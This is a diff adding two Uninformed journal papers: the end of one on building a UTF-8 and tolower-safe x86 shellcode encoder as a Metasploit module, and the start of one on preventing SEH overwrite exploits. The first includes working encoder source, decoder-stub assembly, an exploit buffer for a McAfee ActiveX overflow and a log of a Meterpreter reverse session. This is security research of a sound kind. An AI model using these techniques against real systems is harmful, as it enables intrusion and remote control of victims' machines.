+on characters from these two sets for their decoder stub and subsequent encoded
+data. For that reason, and for the challenge, it's worth pursuing the
+implementation of a custom encoder.
+
+While this particular vulnerability will permit the use of many characters
+above 0x80, it makes the challenge that much more interesting, and particularly
+useful, to limit the usable character set to the characters described below. 
+The reason this range is more useful is because the characters are UTF-8 safe +and also tolower safe. Like most good payloads, the encoder will also avoid +NULL bytes. + + +0x01 -> 0x40 +0x5B -> 0x7f + + +As with all encoded formats, there are actually two major pieces involved. The +first part is the encoder itself. The encoder is responsible for taking a raw +buffer and encoding it into the appropriate format. The second part is the +decoder, which, as is probably obvious, takes the encoded form and converts it +back into the raw form so that it can be executed as a payload. The +implementation of these two pieces will be described in the following chapters. + + +3) Implementing the Decoder + +The implementation of the decoder involves taking the encoded form and +converting it back into the raw form. This must all be done using assembly +instructions that will execute natively on the target machine after an exploit +has succeeded and it must also use only those instructions that fall within the +valid character set. To accomplish this, it makes sense to figure out what +instructions are available out of the valid character set. To do that, it's as +simple as generating all of the permutations of the valid characters in both +the first and second byte positions. This provides a pretty good idea of what's +available. The end-result of such a process is a list of about 105 unique +instructions (independent of operand types). Of those instructions the most +interesting are listed below: + + +add +sub +imul +inc +cmp +jcc +pusha +push +pop +and +or +xor + + +Some very useful instructions are available, such as add, xor, push, pop, and a +few jcc's. While there's an obvious lack of the traditional mov instruction, +it can be made up for through a series of push and pop instructions, if needed. +With the set of valid instructions identified, it's possible to begin +implementing the decoder. Most decoders will involve three implementation +phases. The first phase is used to determine the base address of the decoder +stub using a geteip technique. Following that, the encoded data must be +transformed from its character-safe form to the form that it will actually +execute from. Finally, the decoder must transfer control into the decoded data +so that the actual payload can begin executing. These three steps will be +described in the following sections. + +In order to better understand the following sections, it's important to +describe the general approach that is going to be taken to implement the +decoder. The stub header is used to prepare the necessary state for the decode +transforms. The transforms themselves take the encoded data, as a series of +four byte blocks, and translate it using the process described in section . +Finally, execution falls through to the decoded data that is stored in place of +the encoded data. + + +3.1) Determining the Stub's Base Address + + +The first step in most decoder stubs will require the use of a series of +instructions, also referred to as geteip code, that obtain the location of the +current instruction pointer. The reason this is necessary is because most +decoders will have the encoded data placed immediately following the decoder +stub in memory. In order to operate on the encoded data using an absolute +address, it is necessary to determine where the data is at. 
If the decoder
+stub can determine the address that it's executing from, then it can determine
+the address of the encoded data immediately following it in memory in a
+position-independent fashion. As one might expect, the character limitations of
+this challenge make it quite a bit harder to get the value of the current
+instruction pointer.
+
+There are a number of different techniques that can be used to get the value of
+the instruction pointer on x86. However, the majority of these techniques rely
+on the use of the call instruction. The problem with the use of the call
+instruction is that it is generally composed of a high ASCII byte, such as 0xe8
+or 0xff. Another technique that can be used to get the instruction pointer is
+the fnstenv FPU instruction. Unfortunately, this instruction is also composed
+of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
+structured exception handling to get the instruction pointer. This is
+accomplished by registering an exception handler and extracting the Eip value
+from the CONTEXT structure when an exception is generated. In fact, this
+approach has even been implemented in entirely alphanumeric form for Windows by
+SkyLined. Unfortunately, it can't be used in this case because it relies on
+uppercase characters.
+
+With all of the known geteip techniques unusable, it seems like some
+alternative method for getting the base address of the decoder stub will be
+needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
+is common for the decoder stub to assume that a certain register contains the
+base address of the decoder stub. This assumption makes the decoder more
+complicated to use because it can't simply be dropped into any exploit and be
+expected to work. Instead, exploits may need to be modified in order to ensure
+that a register can be found that contains the location, or some location near,
+the decoder stub.
+
+At the time of this writing, the author is not aware of a geteip technique that
+can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
+payloads, the decoder described in this paper will be implemented using a
+register that is explicitly assumed to contain a reference to some address that
+is near the base address of the decoder stub. For this document, the register
+that is assumed to hold the address will be ecx, but it is equally possible to
+use other registers.
+
+For this particular decoder, determining the base address is just the first
+step involved in implementing the stub's header. Once the base address has
+been determined, the decoder must adjust the register that holds the base
+address to point to the location of the encoded data. The reason this is
+necessary is because the next step of the decoder, the transforms, depend on
+knowing the location of the encoded data that they will be operating on. In
+order to calculate this address, the decoder must add the size of the stub
+header plus the size of all of the decode transforms to the register that
+holds the base address. The end result should be that the register will hold
+the address of the first encoded block.
+
+The following disassembly shows one way that the stub header might be
+implemented. 
In this disassembly, ecx is assumed to point at the beginning of
+the stub header:
+
+
+00000000 6A12 push byte +0x12
+00000002 6B3C240B imul edi,[esp],byte +0xb
+00000006 60 pusha
+00000007 030C24 add ecx,[esp]
+0000000A 6A19 push byte +0x19
+0000000C 030C24 add ecx,[esp]
+0000000F 6A04 push byte +0x4
+
+
+The purpose of the first two instructions is to calculate the number of bytes
+consumed by all of the decode transforms (which are described in section ). It
+accomplishes this by multiplying the size of each transform, which is 0xb
+bytes, by the total number of transforms, which in this example is 0x12. The
+result of the multiplication, 0xc6, is stored in edi. Since each transform is
+capable of decoding four bytes of the raw payload, the maximum number of bytes
+that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
+factor, though, as other combinations of imul can be used to account for larger
+payloads.
+
+Once the size of the decode transforms has been calculated, pusha is executed
+in order to place the edi register at the top of the stack. With the value of
+edi at the top of the stack, the value can be added to the base address
+register ecx, thus accounting for the number of bytes used by the decode
+transforms. The astute reader might ask why the value of edi is indirectly
+added to ecx. Why not just add it directly? The answer, of course, is due to
+bad characters:
+
+
+00000000 01F9 add ecx,edi
+
+
+It's also not possible to simply push edi onto the stack, because the push edi
+instruction also contains bad characters:
+
+
+00000000 57 push edi
+
+
+Starting with the fifth instruction, the size of the stub header, plus any
+other offsets that may need to be accounted for, are added to the base address
+in order to shift the ecx register to point at the start of the encoded data.
+This is accomplished by simply pushing the number of bytes to add onto the
+stack and then adding them to the ecx register indirectly by adding through
+[esp].
+
+After these instructions are finished, ecx will point to the start of the
+encoded data. The final instruction in the stub header is a push byte 0x4. This
+instruction isn't actually used by the stub header, but it's there to set up
+some necessary state that will be used by the decode transforms. Its use will
+be described in the next section.
+
+
+3.2) Transforming the Encoded Data
+
+The most important part of any decoder is the way in which it transforms the
+data from its encoded form to its actual form. For example, many of the
+decoders used in the Metasploit Framework and elsewhere will xor a portion of
+the encoded data with a key that results in the actual bytes of the original
+payload being produced. While this is an effective way of obtaining the desired
+results, it's not possible to use such a technique with the character set
+limitations currently defined in this paper.
+
+In order to transform encoded data back to its original form, it must be
+possible to produce any byte from 0x00 to 0xff using any number of combinations
+of bytes that fall within the valid character set. This means that this
+decoder will be limited to using combinations of characters that fall within
+0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
+accomplishing the transformation, it makes sense to investigate each of the
+useful instructions that were identified earlier in this chapter.
+
+The bitwise instructions, such as and, or, and xor, are not going to be
+particularly useful to this decoder. 
The main reason for this is that they are
+unable to produce values that reside outside of the valid character sets
+without the aid of a bit shifting instruction. For example, no combination of
+and, or, or xor on two values from the valid character set can produce a byte
+above 0x7f, such as 0x80. While xor could at least be used to produce 0x00,
+that's about all that it could do other than producing other values below the
+0x80 boundary. These restrictions make the bitwise instructions unusable.
+
+The imul instruction could be useful in that it is possible to multiply two
+characters from the valid character set together to produce values that reside
+outside of the valid character set. For example, multiplying 0x02 by 0x7f
+produces 0xfe. While this may have its uses, there are two remaining
+instructions that are actually the most useful.
+
+The add instruction can be used to produce almost all possible characters.
+However, it's unable to produce a few specific values. For example, it's
+impossible to add two valid characters together to produce 0x00. It is also
+impossible to add two valid characters together to produce 0xff and 0x01.
+While this limitation may make it appear that the add instruction is unusable,
+its saving grace is the sub instruction.
+
+Like the add instruction, the sub instruction is capable of producing almost
+all possible characters. It is certainly capable of producing the values that
+add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
+It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
+produced by subtracting 0x02 from 0x03. However, like the add instruction,
+there are also characters that the sub instruction cannot produce. These
+characters include 0x7f, 0x80, and 0x81.
+
+Given this analysis, it seems that using add and sub in combination is most
+likely going to be the best choice when it comes to transforming encoded data
+for this decoder. With the fundamental operations selected, the next step is
+to attempt to implement the code that actually performs the transformation. In
+most decoders, the transform will be accomplished through a loop that simply
+performs the same operation on a pointer that is incremented by a set number of
+bytes each iteration. This type of approach results in all of the encoded data
+being decoded prior to executing it. Using this type of technique is a little
+bit more complicated for this decoder, though, because it can't simply rely on
+the use of a static key and it's also limited in terms of what instructions it
+can use within the loop.
+
+For these reasons, the author decided to go with an alternative technique for
+the transformation portion of the decoder stub. Rather than using a loop that
+iterates over the encoded data, the author chose to use a series of sequential
+transformations where each block of the encoded data was decoded. This
+technique has been used before in similar situations. One negative aspect of
+using this approach over a loop-based approach is that it substantially
+increases the size of the encoded payload. While this gives an idea of the
+structure of the decoder, it doesn't give a concrete understanding of how it's
+actually implemented. It's at this point that one must descend from the lofty
+high-level. What better way to do this than diving right into the disassembly? 
+
+
+00000011 6830703C14 push dword 0x143c7030
+00000016 5F pop edi
+00000017 0139 add [ecx],edi
+00000019 030C24 add ecx,[esp]
+
+
+The form of each transform will look exactly like this one. What's actually
+occurring is a four byte value is pushed onto the stack and then popped into
+the edi register. This is done in place of a mov instruction because the mov
+instruction contains invalid characters. Once the value is in the edi
+register, it is either added to or subtracted from its respective encoded data
+block. The result of the add or subtract is stored in place of the previously
+encoded data. Once the transform has completed, it adds the value at the top
+of the stack, which was set to 0x4 in the decoder stub header, to the register
+that holds the pointer into the encoded data. This results in the pointer
+moving on to the next encoded data block so that the subsequent transform will
+operate on the correct block.
+
+This simple process is all that's necessary to perform the transformations
+using only valid characters. As mentioned above, one of the negative aspects
+of this approach is that it does add quite a bit of overhead to the original
+payload. For each four byte block, 11 bytes of overhead are added. The
+approach is also limited by the fact that if there is ever a portion of the raw
+payload that contains characters that add cannot handle, such as 0x00, and also
+contains characters that sub cannot handle, such as 0x80, then it will not be
+possible to encode it.
+
+
+3.3) Transferring Control to the Decoded Data
+
+Due to the way the decoder is structured, there is no need for it to include
+code that directly transfers control to the decoded data. Since this decoder
+does not use any sort of looping, execution control will simply fall through to
+the decoded data after all of the transformations have completed.
+
+
+4) Implementing the Encoder
+
+The encoder portion is made up of code that runs on an attacker's machine prior
+to exploiting a target. It converts the actual payload that will be executed
+into the encoded format and then transmits the encoded form as the payload.
+Once the target begins executing code, the decoder, as described in chapter ,
+converts the encoded payload back into its raw form and then executes it.
+
+For the purposes of this document, the client-side encoder was implemented in
+the 3.0 version of the Metasploit Framework as an encoder module for x86. This
+chapter will describe what was actually involved in implementing the encoder
+module for the Metasploit Framework.
+
+The very first step involved in implementing the encoder is to create the
+appropriate file and set up the class so that it can be loaded into the
+framework. This is accomplished by placing the encoder module's file in the
+appropriate directory, which in this case is modules/encoders/x86. The name of
+the module's file is important only in that the module's reference name is
+derived from the filename. For example, this encoder can be referenced as
+x86/avoid_utf8_tolower based on its filename. In this case, the module's
+filename is avoid_utf8_tolower.rb. Once the file is created in the appropriate
+location, the next step is to define the class and provide the framework with
+the appropriate module information.
+
+To define the class, it must be placed in the appropriate namespace that
+reflects where it is at on the filesystem. In this case, the module is placed
+in the Msf::Encoders::X86 namespace. 
The name of the class itself is not
+important so long as it is unique within the namespace. When defining the
+class, it is important that it inherit from the Msf::Encoder base class at some
+level. This ensures that it implements all the required methods for an encoder
+to function when the framework is interacting with it.
+
+At this point, the class definition should look something like this:
+
+
+require 'msf/core'
+
+module Msf
+module Encoders
+module X86
+
+class AvoidUtf8 < Msf::Encoder
+
+end
+
+end
+end
+end
+
+
+With the class defined, the next step is to create a constructor and to pass
+the appropriate module information down to the base class in the form of the
+info hash. This hash contains information about the module, such as name,
+version, authorship, and so on. For encoder modules, it also conveys
+information about the type of encoder that's being implemented as well as
+information specific to the encoder, like block size and key size. For this
+module, the constructor might look something like this:
+
+
+def initialize
+ super(
+ 'Name' => 'Avoid UTF8/tolower',
+ 'Version' => '$Revision: 1.3 $',
+ 'Description' => 'UTF8 Safe, tolower Safe Encoder',
+ 'Author' => 'skape',
+ 'Arch' => ARCH_X86,
+ 'License' => MSF_LICENSE,
+ 'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
+ 'Decoder' =>
+ {
+ 'KeySize' => 4,
+ 'BlockSize' => 4,
+ })
+end
+
+
+With all of the boilerplate code out of the way, it's time to finally get into
+implementing the actual encoder. When implementing encoder modules in the 3.0
+version of the Metasploit Framework, there are a few key methods that can be
+overridden by a derived class. These methods are described in detail in the
+developer's guide, so an abbreviated explanation of only those useful to this
+encoder will be given here. Each method will be explained in its own
+individual section.
+
+4.1) decoder_stub
+
+First and foremost, the decoder_stub method gives an encoder module the
+opportunity to dynamically generate a decoder stub. The framework's idea of
+the decoder stub is equivalent to the stub header described in chapter . In
+this case, it must simply provide a buffer whose assembly will set up a
+specific register to point to the start of the encoded data blocks as described
+in section . The completed version of this method might look something like
+this:
+
+
+def decoder_stub(state)
+ len = ((state.buf.length + 3) & (~0x3)) / 4
+
+ off = (datastore['BufferOffset'] || 0).to_i
+
+ decoder =
+ "\x6a" + [len].pack('C') + # push len
+ "\x6b\x3c\x24\x0b" + # imul 0xb
+ "\x60" + # pusha
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
+ "\x03\x0c\x24" + # add ecx, [esp]
+ "\x6a\x04" # push byte 0x4
+
+ state.context = ''
+
+ return decoder
+end
+
+
+In this routine, the length of the raw buffer, as found through
+state.buf.length, is aligned up to a four byte boundary and then divided by
+four. Following that, an optional buffer offset is stored in the off local
+variable. The purpose of the BufferOffset optional value is to allow exploits
+to cause the encoder to account for extra size overhead in the ecx register
+when doing its calculations. The decoder stub is then generated using the
+calculated length and offset to produce the stub header. The stub header is
+then returned to the caller.
+
+
+4.2) encode_block
+
+The next important method to override is the encode_block method. 
This method +is used by the framework to allow an encoder to encode a single block and +return the resultant encoded buffer. The size of each block is provided to the +framework through the encoder's information hash. For this particular encoder, +the block size is four bytes. The implementation of the encode_block routine is +as simple as trying to encode the block using either the add instruction or the +sub instruction. Which instruction is used will depend on the bytes in the +block that is being encoded. + + +def encode_block(state, block) + buf = try_add(state, block) + + if (buf.nil?) + buf = try_sub(state, block) + end + + if (buf.nil?) + raise BadcharError.new(state.encoded, 0, 0, 0) + end + + buf +end + + +The first thing encode_block tries is add. The try_add method is implemented as +shown below: + + +def try_add(state, block) + buf = "\x68" + vbuf = '' + ctx = '' + + block.each_byte { |b| + return nil if (b == 0xff or b == 0x01 or b == 0x00) + + begin + xv = rand(b - 1) + 1 + end while (is_badchar(state, xv) or is_badchar(state, b - xv)) + + vbuf += [xv].pack('C') + ctx += [b - xv].pack('C') + } + + buf += vbuf + "\x5f\x01\x39\x03\x0c\x24" + + state.context += ctx + + return buf +end + + +The try_add routine enumerates each byte in the block, trying to find a random +byte that, when added to another random byte, produces the byte value in the +block. The algorithm it uses to accomplish this is to loop selecting a random +value between 1 and the actual value. From there a check is made to ensure +that both values are within the valid character set. If they are both valid, +then one of the values is stored as one of the bytes of the 32-bit immediate +operand to the push instruction that is part of the decode transform for the +current block. The second value is appended to the encoded block context. +After all bytes have been considered, the instructions that compose the decode +transform are completed and the encoded block context is appended to the string +of encoded blocks. Finally, the decode transform is returned to the framework. + +In the event that any of the bytes that compose the block being encoded by +try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this +happens, the encode_block routine will attempt to encode the block using the sub +instruction. The implementation of the try_sub routine is shown below: + + +def try_sub(state, block) + buf = "\x68"; + vbuf = '' + ctx = '' + carry = 0 + + block.each_byte { |b| + return nil if (b == 0x80 or b == 0x81 or b == 0x7f) + + x = 0 + y = 0 + prev_carry = carry + + begin + carry = prev_carry + + if (b > 0x80) + diff = 0x100 - b + y = rand(0x80 - diff - 1).to_i + 1 + x = (0x100 - (b - y + carry)) + carry = 1 + else + diff = 0x7f - b + x = rand(diff - 1) + 1 + y = (b + x + carry) & 0xff + carry = 0 + end + + end while (is_badchar(state, x) or is_badchar(state, y)) + + vbuf += [x].pack('C') + ctx += [y].pack('C') + } + + buf += vbuf + "\x5f\x29\x39\x03\x0c\x24" + + state.context += ctx + + return buf +end + + +Unlike the try_add routine, the try_sub routine is a little bit more +complicated, perhaps unnecessarily. The main reason for this is that +subtracting two 32-bit values has to take into account things like carrying +from one digit to another. The basic idea is the same. Each byte in the block +is enumerated. If the byte is above 0x80, the routine calculates the +difference between 0x100 and the byte. From there, it calculates the y value +as a random number between 1 and 0x80 minus the difference. 
Using the y value,
+it generates the x value as 0x100 minus the quantity (the byte value minus y
+plus the current carry flag). To better understand this, consider the following
+scenario.
+
+Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
+is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
+1) + 1. Given this value for y, the value of x would be, assuming a zero carry
+flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
+
+However, if the byte value is less than 0x80, then a different method is used
+to select the x and y values. In this case, the difference is calculated as
+0x7f minus the value of the current byte. The value of x is then assigned a
+random value between 1 and the difference. The value of y is then calculated
+as the current byte plus x plus the carry flag. For example, if the value is
+0x24, then the values could be calculated as described in the following
+scenario.
+
+First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
+0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
+calculated as 0x3c from 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
+
+Given these two methods of calculating the individual byte values, it's
+possible to encode all bytes with the exception of 0x7f, 0x80, and 0x81. If any
+one of these three bytes is encountered, the try_sub routine will return nil
+and the encoding will fail. Otherwise, the routine will complete in a fashion
+similar to the try_add routine. However, rather than using an add instruction,
+it uses the sub instruction.
+
+4.3) encode_end
+
+
+With all the encoding cruft out of the way, the final method that needs to be
+overridden is encode_end. In this method, the state.context attribute is
+appended to the state.encoded. The purpose of the state.context attribute is
+to hold all of the encoded data blocks that are created over the course of
+encoding each block. The state.encoded attribute is the actual decoder
+including the stub header, the decode transformations, and finally, the encoded
+data blocks.
+
+
+def encode_end(state)
+ state.encoded += state.context
+end
+
+
+Once encoding completes, the result might be a disassembly that looks something
+like this:
+
+
+$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
+ ./msfencode -e x86/avoid_utf8_tolower -t raw | \
+ ndisasm -u -
+[*] x86/avoid_utf8_tolower succeeded, final size 47
+
+00000000 6A02 push byte +0x2
+00000002 6B3C240B imul edi,[esp],byte +0xb
+00000006 60 pusha
+00000007 030C24 add ecx,[esp]
+0000000A 6A11 push byte +0x11
+0000000C 030C24 add ecx,[esp]
+0000000F 6A04 push byte +0x4
+00000011 683C0C190D push dword 0xd190c3c
+00000016 5F pop edi
+00000017 0139 add [ecx],edi
+00000019 030C24 add ecx,[esp]
+0000001C 68696A6060 push dword 0x60606a69
+00000021 5F pop edi
+00000022 0139 add [ecx],edi
+00000024 030C24 add ecx,[esp]
+00000027 06 push es
+00000028 1467 adc al,0x67
+0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
+0000002E 6C insb
+
+
+5) Applying the Encoder
+
+The whole reason that this encoder was originally needed was to take advantage
+of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
+that the encoder has been implemented, all that's left is to try it out and see
+if it works. To test this against a Windows XP SP0 target, the overflow buffer
+might be constructed as follows.
+
+First, a string of 2972 random text characters must be generated. The return
+address should follow the random character string. 
An example of a valid
+return address for this target is 0x7605122f, which is the location of a jmp esp
+instruction in shell32.dll. Immediately following the return address in the
+overflow buffer should be a series of five instructions:
+
+
+00000000 60 pusha
+00000001 6A01 push byte +0x1
+00000003 6A01 push byte +0x1
+00000005 6A01 push byte +0x1
+00000007 61 popa
+
+
+The purpose of this series of instructions is to cause the value of esp at the
+time that the pusha occurs to be popped into the ecx register. As the reader
+should recall, the ecx register is used as the base address for the decoder
+stub. However, since esp doesn't actually point to the base address of the
+decoder stub, the encoder must be informed that 8 extra bytes must be added to
+ecx when accounting for the extra offset into the encoded data blocks. This is
+conveyed by setting the BufferOffset value to 8. After these five instructions
+should come the encoded version of the payload. To better visualize this,
+consider the following snippet from the exploit:
+
+
+buf =
+ Rex::Text.rand_text(2972, payload_badchars) +
+ [ ret ].pack('V') +
+ "\x60" + # pusha
+ "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
+ "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
+ "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
+ "\x61" + # popa
+ p.encoded
+
+
+With the overflow buffer ready to go, the only thing left to do is fire off an
+exploit attempt by having the machine browse to the malicious website:
+
+
+msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
+[*] Started reverse handler
+[*] Using URL: http://x.x.x.3:8080/foo
+[*] Server started.
+[*] Exploit running as background job.
+msf exploit(mcafee_mcsubmgr_vsprintf) >
+[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
+[*] Sending stage (2834 bytes)
+[*] Sleeping before handling stage...
+[*] Uploading DLL (73739 bytes)...
+[*] Upload completed.
+[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
+
+msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter >
+
+
+6) Conclusion
+
+The purpose of this paper was to illustrate the process of implementing a
+custom encoder for the x86 architecture. In particular, the encoder
+described in this paper was designed to make it possible to encode payloads in
+a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
+encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
+control was used because of its restrictions on uppercase characters. While
+many readers may never find it necessary to implement an encoder, it's
+nevertheless a necessary topic to understand for those who are interested in
+exploitation research.
+
+
+A. References
+
+eEye. McAfee Subscription Manager Stack Buffer Overflow.
+http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
+accessed Aug 26, 2006.
+
+
+Metasploit Staff. Metasploit 3.0 Developer's Guide.
+http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
+accessed Aug 26, 2006.
+
+
+Spoonm. Recent Shellcode Developments.
+http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
+accessed Aug 26, 2006.
+
+
+SkyLined. Alpha 2.
+http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php;
+accessed Aug 26, 2006. 
+ + + + diff --git a/uninformed/5.2.txt b/uninformed/5.2.txt new file mode 100644 index 0000000..80d4eff --- /dev/null +++ b/uninformed/5.2.txt @@ -0,0 +1,782 @@ +Preventing the Exploitation of SEH Overwrites +9/2006 +skape +mmiller@hick.org + + +1) Foreword + +Abstract: This paper proposes a technique that can be used to prevent +the exploitation of SEH overwrites on 32-bit Windows applications +without requiring any recompilation. While Microsoft has attempted to +address this attack vector through changes to the exception dispatcher +and through enhanced compiler support, such as with /SAFESEH and /GS, +the majority of benefits they offer are limited to image files that have +been compiled to make use of the compiler enhancements. This limitation +means that without all image files being compiled with these +enhancements, it may still be possible to leverage an SEH overwrite to +gain code execution. In particular, many third-party applications are +still vulnerable to SEH overwrites even on the latest versions of +Windows because they have not been recompiled to incorporate these +enhancements. To that point, the technique described in this paper does +not rely on any compile time support and instead can be applied at +runtime to existing applications without any noticeable performance +degradation. This technique is also backward compatible with all +versions of Windows NT+, thus making it a viable and proactive solution +for legacy installations. + +Thanks: The author would like to thank all of the people who have helped +with offering feedback and ideas on this technique. In particular, the +author would like to thank spoonm, H D Moore, Skywing, Richard Johnson, +and Alexander Sotirov. + + +2) Introduction + +Like other operating systems, the Windows operating system finds itself +vulnerable to the same classes of vulnerabilities that affect other +platforms, such as stack-based buffer overflows and heap-based buffer +overflows. Where the platforms differ is in terms of how these +vulnerabilities can be leveraged to gain code execution. In the case of +a conventional stack-based buffer overflow, the overwriting of the +return address is the most obvious and universal approach. However, +unlike other platforms, the Windows platform has a unique vector that +can, in many cases, be used to gain code execution through a stack-based +overflow that is more reliable than overwriting the return address. +This vector is known as a Structured Exception Handler (SEH) overwrite. +This attack vector was publicly discussed for the first time, as far as +the author is aware, by David Litchfield in his paper entitled Defeating +the Stack Based Buffer Overflow Prevention Mechanism of Microsoft +Windows 2003 Server However, exploits had been using this technique +prior to the publication, so it is unclear who originally found the +technique. + +In order to completely understand how to go about protecting against SEH +overwrites, it's prudent to first spend some time describing the +intention of the facility itself and how it can be abused to gain code +execution. To provide this background information, a description of +structured exception handling will be given in section 2.1. Section 2.2 +provides an illustration of how an SEH overwrite can be used to gain +code execution. If the reader already understands how structured +exception handling works and can be exploited, feel free to skip ahead. 
+The design of the technique that is the focus of this paper will be
+described in chapter 3 followed by a description of a proof of concept
+implementation in chapter 4. Finally, potential compatibility issues are
+noted in chapter 5.
+
+
+2.1) Structured Exception Handling
+
+
+Structured Exception Handling (SEH) is a uniform system for dispatching
+and handling exceptions that occur during the normal course of a
+program's execution. This system is similar in spirit to the way that
+UNIX derivatives use signals to dispatch and handle exceptions, such as
+through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and
+powerful system for accomplishing this task, in the author's opinion.
+Microsoft's integration of SEH spans both user-mode and kernel-mode and
+is a licensed implementation of what is described in a patent owned by
+Borland. In fact, this patent is one of the reasons why open source
+operating systems have not chosen to integrate this style of exception
+dispatching.
+
+In terms of implementation, structured exception handling works by
+defining a uniform way of handling all exceptions that occur during the
+normal course of process execution. In this context, an exception is
+defined as an event that occurs during execution that necessitates some
+form of extended handling. There are two primary types of exceptions.
+The first type, known as a hardware exception, is used to categorize
+exceptions that originate from hardware. For example, when a program
+makes reference to an invalid memory address, the processor will raise
+an exception through an interrupt that gives the operating system an
+opportunity to handle the error. Other examples of hardware exceptions
+include illegal instructions, alignment faults, and other
+architecture-specific issues. The second type of exception is known as
+a software exception. A software exception, as one might expect,
+originates from software rather than from the hardware. For example, in
+the event that a process attempts to close an invalid handle, the
+operating system may generate an exception.
+
+One of the reasons that the word structured is included in structured
+exception handling is because of the fact that it is used to dispatch
+both hardware and software exceptions. This generalization makes it
+possible for applications to handle all types of exceptions using a
+common system, thus allowing for greater application flexibility when it
+comes to error handling.
+
+The most important detail of SEH, insofar as it pertains to this
+document, is the mechanism through which applications can dynamically
+register handlers to be called when various types of exceptions occur.
+The act of registering an exception handler is most easily described as
+inserting a function pointer into a chain of function pointers that are
+called whenever an exception occurs. Each exception handler in the
+chain is given the opportunity to either handle the exception or pass it
+on to the next exception handler.
+
+At a higher level, the majority of compiler-generated C/C++ functions
+will register exception handlers in their prologue and remove them in
+their epilogue. In this way, the exception handler chain mirrors the
+structure of a thread's stack in that they are both LIFOs
+(last-in-first-out). The exception handler that was registered last
+will be the first to be removed from the chain, much the same as the
+last function to be called will be the first to be returned from. 
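+
+Before looking at how a compiler emits this registration code, it may help to
+make the shape of the chain itself concrete. The following is a minimal sketch,
+not taken from this paper's implementation, that walks the current thread's
+handler list on a 32-bit build. The two-field record layout it assumes is the
+undocumented layout described later in this section, and the 0xffffffff
+terminator matches the empty-list value mentioned below.
+
+
+#include <windows.h>
+#include <stdio.h>
+
+/* Assumed x86-only layout of a registration record; this mirrors the
+   undocumented structure described in the text rather than an SDK type. */
+typedef struct _SEH_RECORD {
+    struct _SEH_RECORD *Next;    /* 0xffffffff marks the end of the chain */
+    void               *Handler;
+} SEH_RECORD;
+
+int main(void)
+{
+    /* The NT_TIB at the start of the TEB exposes the head of the chain,
+       which registration code reaches through fs:[0]. */
+    SEH_RECORD *record =
+        (SEH_RECORD *)((NT_TIB *)NtCurrentTeb())->ExceptionList;
+
+    while (record != (SEH_RECORD *)(ULONG_PTR)-1) {
+        printf("record at %p, handler at %p\n",
+               (void *)record, record->Handler);
+        record = record->Next;
+    }
+
+    return 0;
+}
+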
+To understand how the process of registering an exception handler
+actually works in practice, it makes sense to analyze code that makes
+use of exception handling. For instance, the code below illustrates what
+would be required to catch all exceptions and then display the type of
+exception that occurred:
+
+
+__try
+{
+ ...
+} __except(EXCEPTION_EXECUTE_HANDLER)
+{
+ printf("Exception code: %.8x\n", GetExceptionCode());
+}
+
+In the event that an exception occurs from code inside of the try / except
+block, the printf call will be issued and GetExceptionCode will return the
+actual exception that occurred. For instance, if code made reference to an
+invalid memory address, the exception code would be 0xc0000005, or
+EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is
+necessary to dive deeper and take a look at the assembly that is generated from
+the C code described above. When disassembled, the code looks something like
+what is shown below:
+
+
+00401000 55 push ebp
+00401001 8bec mov ebp,esp
+00401003 6aff push 0xff
+00401005 6818714000 push 0x407118
+0040100a 68a4114000 push 0x4011a4
+0040100f 64a100000000 mov eax,fs:[00000000]
+00401015 50 push eax
+00401016 64892500000000 mov fs:[00000000],esp
+0040101d 83c4f4 add esp,0xfffffff4
+00401020 53 push ebx
+00401021 56 push esi
+00401022 57 push edi
+00401023 8965e8 mov [ebp-0x18],esp
+00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0
+0040102d c6050000000001 mov byte ptr [00000000],0x1
+00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
+0040103b eb2b jmp ex!main+0x68 (00401068)
+0040103d 8b45ec mov eax,[ebp-0x14]
+00401040 8b08 mov ecx,[eax]
+00401042 8b11 mov edx,[ecx]
+00401044 8955e4 mov [ebp-0x1c],edx
+00401047 b801000000 mov eax,0x1
+0040104c c3 ret
+
+0040104d 8b65e8 mov esp,[ebp-0x18]
+00401050 8b45e4 mov eax,[ebp-0x1c]
+00401053 50 push eax
+00401054 6830804000 push 0x408030
+00401059 e81b000000 call ex!printf (00401079)
+0040105e 83c408 add esp,0x8
+00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
+00401068 8b4df0 mov ecx,[ebp-0x10]
+0040106b 64890d00000000 mov fs:[00000000],ecx
+00401072 5f pop edi
+00401073 5e pop esi
+00401074 5b pop ebx
